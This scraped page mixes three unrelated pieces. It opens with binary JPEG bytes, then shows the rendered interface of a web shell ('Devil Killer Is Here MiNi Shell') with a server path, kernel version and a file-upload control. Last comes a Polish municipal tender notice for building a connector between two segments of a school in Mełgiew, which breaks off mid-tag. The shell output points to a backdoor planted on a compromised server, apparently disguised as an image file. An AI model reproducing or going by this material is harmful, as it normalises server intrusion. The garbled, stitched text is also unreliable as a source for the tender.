JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210702/0010334001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00103340 z dnia 2021-07-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa łącznika między segmentem dydaktycznym A i segmentem dydaktyczno-sportowym B Szkoły Podstawowej im. Józefa Piłsudskiego w Mełgwi” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MEŁGIEW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019589</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Partyzancka 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mełgiew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-007</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(81) 46 05 710</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(81) 460 57 90</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@melgiew.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://melgiew.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa łącznika między segmentem dydaktycznym A i segmentem dydaktyczno-sportowym B Szkoły Podstawowej im. Józefa Piłsudskiego w Mełgwi” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e9163072-db3f-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00103340</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002054/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.12 Budowa łącznika między segmentem dydaktycznym A i segmentem dydaktyczno-sportowym B Szkoły Podstawowej im. Józefa Piłsudskiego w Mełgwi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ugmelgiew.bip.lubelskie.pl/index.php?id=146 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa<br/>się za pośrednictwem miniPortalu https://miniportal.uzp.gov.pl ePUAPu https://epuap.gov.pl/wps/portal<br/>oraz poczty elektronicznej adres e-mail Zamawiającego: zamowienia@melgiew.pl . Wnioski,<br/>zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pośrednictwem<br/>dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz<br/>do komunikacji) lub poczty elektronicznej: zamowienia@melgiew.pl . Zamawiający może również<br/>komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: zamowienia@melgiew.pl<br/>.We wszelkiej korespondencji związanej z niniejszym postępowaniem należy posługiwać się numerem<br/>referencyjnym: ZP.271.11.2021.Osobą uprawnioną do komunikowania się z Wykonawcami jest p.<br/>Agnieszka Zajączkowska – pracownik Urzędu Gminy Mełgiew.Dane postępowanie można wyszukać<br/>również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców”<br/>lub ze strony głównej z zakładki Postępowania.Dokumenty elektroniczne, oświadczenia lub<br/>elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem<br/>Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za<br/>pomocą poczty elektronicznej, na wskazany w pkt 11.3 adres email. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty<br/>lub wniosku oraz do formularza do komunikacji.Za datę przekazania oferty, wniosków, zawiadomień,<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz<br/>innych informacji przyjmuje się datę ich przekazania na ePUAP. Maksymalny rozmiar plików<br/>przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub<br/>wniosku oraz do komunikacji wynosi 150 MB. Zasady składania ofert oraz dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne ich wysyłania opisane zostały w Instrukcji<br/>użytkownika. Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i postępować wg zasad w<br/>niej wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w szczególności składając ofertę<br/>akceptuje zasady korzystania z systemu miniPortal wskazane w Instrukcji użytkownika i<br/>SWZ.Sporządzanie i przekazywanie informacji w tym dokumentów elektronicznych musi być zgodne z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie.W celu korzystania z systemu miniPortal konieczne jest<br/>dysponowanie przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet.<br/>Aplikacja działa tylko na platformie Windows i wymaga .NET Framework 4.5. W przypadku korzystania<br/>z urządzeń mobilnych oraz Mac lub Linux, dostęp do wszystkich funkcjonalności systemu miniPortal<br/>może być ograniczony. Ze względu na ograniczoną ilość znaków w tej tabeli Specyfikacja połączenia,<br/>formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych a także wskazanie<br/>przeglądarek internetowych jest opisane w Rozdziale 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (Dz. Urz. UE L 119 z 04.05.2016, str. 1),dalej „RODO”, Zamawiający<br/>informuje, że:1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane<br/>Wykonawca przekazał w niniejszym postępowaniu;2)dane osobowe Wykonawcy przetwarzane będą<br/>na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego na zadanie pn.: „Budowa łącznika między segmentem dydaktycznym A i segmentem<br/>dydaktyczno-sportowym B Szkoły Podstawowej im. Józefa Piłsudskiego w Mełgwi” prowadzonym w<br/>trybie podstawowym;3)odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia<br/>29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.), dalej<br/>„ustawa Pzp”; 4)dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;5)obowiązek<br/>podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp; 6)w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;7)Wykonawca posiada:-na podstawie art. 15 RODO<br/>prawo dostępu do danych osobowych dotyczących Wykonawcy; - na podstawie art. 16 RODO prawo<br/>do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą<br/>Pzp oraz nie narusza integralności protokołu oraz jego załączników;- na podstawie art. 18 RODO<br/>prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO; - prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych<br/>narusza przepisy RODO;8)Wykonawcy nie przysługuje:- w związku z art. 17 ust. 3 lit. b, d lub e RODO<br/>prawo do usunięcia danych osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w<br/>art. 20 RODO;- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c<br/>RODO. W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której<br/>dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub<br/>konkursu.Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani<br/>zmianą postanowień umowy w zakresie niezgodnym z ustawą.Wystąpienie z żądaniem, o którym<br/>mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.W przypadku<br/>danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych,<br/>prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.11.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje:realizację zadania inwestycyjnego pn. „Budowa łącznika<br/>między segmentem dydaktycznym A i segmentem dydaktyczno-sportowym B Szkoły<br/>Podstawowej im. Józefa Piłsudskiego w Mełgwi”.<br/>Przedmiot zamówienia obejmuje budowę parterowego łącznika pomiędzy segmentem<br/>dydaktycznym A i segmentem dydaktyczno-sportowym B budynku Szkoły Podstawowej im.<br/>Józefa Piłsudskiego w Mełgwi, zlokalizowanego przy ul. Partyzanckiej 19 w Mełgwi na działce o<br/>numerze ewidencyjnym 436.<br/>W chwili obecnej oba segmenty Szkoły nie są połączone stałym łącznikiem (istnieje jedynie<br/>częściowe zadaszenie przejścia między segmentami). Dlatego też, przeprowadzone roboty<br/>budowlane mają zapewnić wykonanie stałego, parterowego łącznika pomiędzy dwoma<br/>sąsiadującymi ze sobą segmentami Szkoły. Równocześnie, w ramach likwidacji barier<br/>architektonicznych, przed wejściem głównym do Szkoły zostanie wykonany podjazd dla osób<br/>niepełnosprawnych.<br/>Zakres robót budowlanych obejmuje w branży budowlanej:<br/>- rozbiórkę zadaszonego podjazdu dla osób niepełnosprawnych, istniejącego przed drzwiami<br/>wejściowymi do segmentu dydaktyczno-sportowego B w ścianie pn. - zach.,<br/>- rozbiórkę zewnętrznego wiatrołapu segmentu dydaktycznego A,<br/>- wymianę jednoskrzydłowych drzwi zewnętrznych w ścianie pn.-zach. segmentu<br/>dydaktycznosportowego<br/>B na drzwi dwuskrzydłowe D1, spełniające wymogi drzwi na drodze ewakuacji, wraz<br/>z poszerzeniem otworu, wykonaniem nadproża i przebudową przylegającej doń ścianki<br/>działowej,<br/>- wymianę jednoskrzydłowych drzwi zewnętrznych w ścianie pn.-zach. segmentu dydaktycznego<br/>A na drzwi dwuskrzydłowe D4, spełniające wymogi drzwi na drodze ewakuacji wraz z dwuskrzydłowych drzwi zewnętrznych w ścianie pd.-wsch. segmentu dydaktycznego<br/>A na drzwi dwuskrzydłowe D2, spełniające wymogi drzwi na drodze ewakuacji wraz z<br/>przebudową fragmentu ściany i wykonaniem nadproża,<br/>- wykonanie parterowego, stałego łącznika między segmentem dydaktycznym A i segmentem<br/>dydaktyczno-sportowym B,<br/>- wykonanie zadaszenia wejścia D3 w ścianie pn.-wsch. łącznika oraz zadaszenia wejścia D4 w<br/>ścianie pn.-zach. segmentu dydaktycznego A,<br/>- wykonanie podjazdu dla osób niepełnosprawnych przed wejściem głównym D5 do segmentu<br/>dydaktyczno-sportowego B od strony pn.- wsch.,<br/>- przebudowę wiatrołapu przed wejściem głównym do segmentu dydaktyczno-sportowego B od<br/>strony pn.- wsch., wynikającą z konieczności poszerzenia istniejących otworów drzwiowych dla<br/>spełnienia wymogów ewakuacji.<br/>Zakres robót budowlanych obejmuje w branży sanitarnej:<br/>− wykonanie instalacji centralnego ogrzewania i instalacji wentylacji hybrydowej w<br/>projektowanym łączniku pomiędzy segmentem dydaktycznym A i segmentem<br/>dydaktycznosportowym<br/>B budynku Szkoły Podstawowej im. Józefa Piłsudskiego w Mełgwi, zlokalizowanego<br/>przy ul. Partyzanckiej 19 w Mełgwi.<br/>− W projekcie budowlanym również ujęto przebudowę istniejącego przyłącza<br/>kanalizacji sanitarnej, ponieważ projektowany łącznik zlokalizowano na w/w przyłączu kanalizacji<br/>sanitarnej - odprowadzenie ścieków sanitarnych z segmentu dydaktycznosportowego B budynku<br/>szkoły.<br/>Zakres robót budowlanych obejmuje w branży elektrycznej:<br/>− wykonanie instalacji elektrycznej: oświetlenia ogólnego, oświetlenia awaryjnego, oświetlenia<br/>kierunkowego ewakuacyjnego.<br/>− przełożenie istniejącego kabla ziemnego wlz kolidującego z fundamentem łącznika. Instalacje<br/>elektryczne łącznika są powiązane z istniejącą instalacją w segmencie dydaktycznym A<br/>budynku.<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku Nr 1a, 1b, 1c do SWZ.<br/>Składają się na niego następujące dokumenty:<br/>1) dokumentacja projektowa w branży: budowlanej, sanitarnej, elektrycznej.<br/>2) specyfikacja techniczna wykonania i odbioru robót budowlanych (STWiOR),<br/>3) przedmiar robót w branży: budowlanej, sanitarnej, elektrycznej.<br/>Z uwagi na to, że wynagrodzenie wykonawcy wskazane w ofercie będzie miało charakter<br/>ryczałtowy, wykonawca przy wycenie oferty powinien opierać się na zakresie wskazanym w<br/>dokumentacji projektowej o której mowa w pkt 1) oraz STWIORB. Przedmiary robót mają<br/>charakter pomocniczy. Wystąpienie w trakcie realizacji umowy robót nieujętych w przedmiarze<br/>lub robót w większej ilości w stosunku do przyjętej w przedmiarze nie będzie uprawniało<br/>wykonawcy do żądania dodatkowego wynagrodzenia - jeżeli roboty te ujęte były w dokumentacji<br/>projektowej o której mowa w pkt 1) lub STWIORB.<br/>Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa i STWIORB.<br/>Wykonawca zobowiązany jest do dokładnego sprawdzenia ilości robót z dokumentacją<br/>projektową. Ewentualny brak w przedmiarze robót koniecznych do wykonania wynikających z<br/>dokumentacji projektowej nie zwalnia Wykonawcy od obowiązku ich wykonania na podstawie<br/>projektu w cenie umownej. Wykonawca ma prawo skorygować w przedmiarze ilości robót do<br/>wielkości według własnych obliczeń na podstawie projektu oraz STWIORB.<br/>W każdym przypadku użycia w opisie przedmiotu zamówienia norm, ocen technicznych,<br/>specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1<br/>pkt 2 oraz ust. 3 ustawy Pzp wykonawca powinien przyjąć, że odniesieniu takiemu towarzyszą<br/>wyrazy „lub równoważne”.<br/>Jeżeli w opisie przedmiotu zamówienia ujęto zapis wynikający z KNR lub KNNR wskazujący na<br/>konieczność wykorzystywania przy realizacji zamówienia konkretnego sprzętu o konkretnych<br/>parametrach Zamawiający dopuszcza używanie innego sprzętu o ile zapewni to osiągnięcie zakładanych parametrów projektowych i nie spowoduje ryzyka niezgodności wykonanych prac z<br/>dokumentacją techniczną.<br/>Przedmiot zamówienia należy wykonać zgodnie z obowiązującymi przepisami prawa, w<br/>szczególności ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333 ze<br/>zm.) wraz z przepisami wykonawczymi, normami i instrukcjami producentów stosowanych<br/>urządzeń i materiałów, zasadami wiedzy technicznej i sztuki budowlanej, pod nadzorem<br/>przedstawicieli Zamawiającego – Inspektora Nadzoru Inwestorskiego oraz samego<br/>Zamawiającego.<br/>Zamawiający nie wymaga w niniejszym postępowaniu przedmiotowych środków dowodowych.<br/>Zamawiający nie dokonuje podziału zamówienia na części z następujących względów:<br/>Wartość zamówienia jest niższa od tzw. progów unijnych które zobowiązują do implementacji<br/>dyrektyw UE. Dyrektywa 2014/24/UE w treści motywu 78 wskazuje, że aby zwiększyć<br/>konkurencję, instytucje zamawiające należy w szczególności zachęcać do dzielenia dużych<br/>zamówień na części. Przedmiotowe zamówienie nie jest dużym zamówieniem w rozumieniu<br/>motywu 78 powołanej dyrektywy UE (dyrektywy stosuje się od tzw. progów UE, a dyrektywa<br/>posługuje się pojęciem dużego zamówienia na gruncie zamówień podlegających dyrektywie - a<br/>więc zamówienia o wartości znacznie przewyższającej tzw. progi UE ). Zamówienie nie zostało<br/>podzielone na części z następujących względów:<br/>1) Przedmiotem zamówienia jest wykonanie robót funkcjonalnie ze sobą związanych.<br/>Rozdzielenie robót groziłoby niedającymi się wyeliminować problemami organizacyjnymi<br/>związanymi z odpowiedzialnością za poszczególne elementy robót wykonywanych przez<br/>różnych wykonawców.<br/>2) Przy tego typu robotach wykonywanych przez różnych wykonawców opóźnienie jednego z<br/>wykonawców wpłynęłoby negatywnie na terminowość wykonania innych elementów inwestycji –<br/>zależnych od terminowego wykonania prac przez innego wykonawcę.<br/>Reasumując, zamawiający nie dokonał podziału zamówienia na części ze względu na to, że<br/>podział taki groziłby nadmiernymi trudnościami technicznymi oraz nadmiernymi kosztami<br/>wykonania zamówienia. Potrzeba skoordynowania działań różnych wykonawców realizujących<br/>poszczególne części zamówienia mogłaby poważnie zagrozić właściwemu wykonaniu<br/>zamówienia. Niedokonanie podziału zamówienia podyktowane było zatem względami<br/>technicznymi, organizacyjnym oraz charakterem przedmiotu zamówienia. Zastosowany<br/>ewentualnie podział zamówienia na części nie zwiększyłby konkurencyjności w sektorze małych<br/>i średnich przedsiębiorstw – zakres zamówienia jest zakresem typowym, umożliwiającym<br/>złożenie oferty wykonawcom z grupy małych lub średnich przedsiębiorstw. Zgodnie z treścią<br/>motywu 78 dyrektywy, Instytucja zamawiająca powinna mieć obowiązek rozważenia celowości<br/>podziału zamówień na części, jednocześnie zachowując swobodę autonomicznego<br/>podejmowania decyzji na każdej podstawie, jaką uzna za stosowną, nie podlegając nadzorowi<br/>administracyjnemu ani sądowemu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 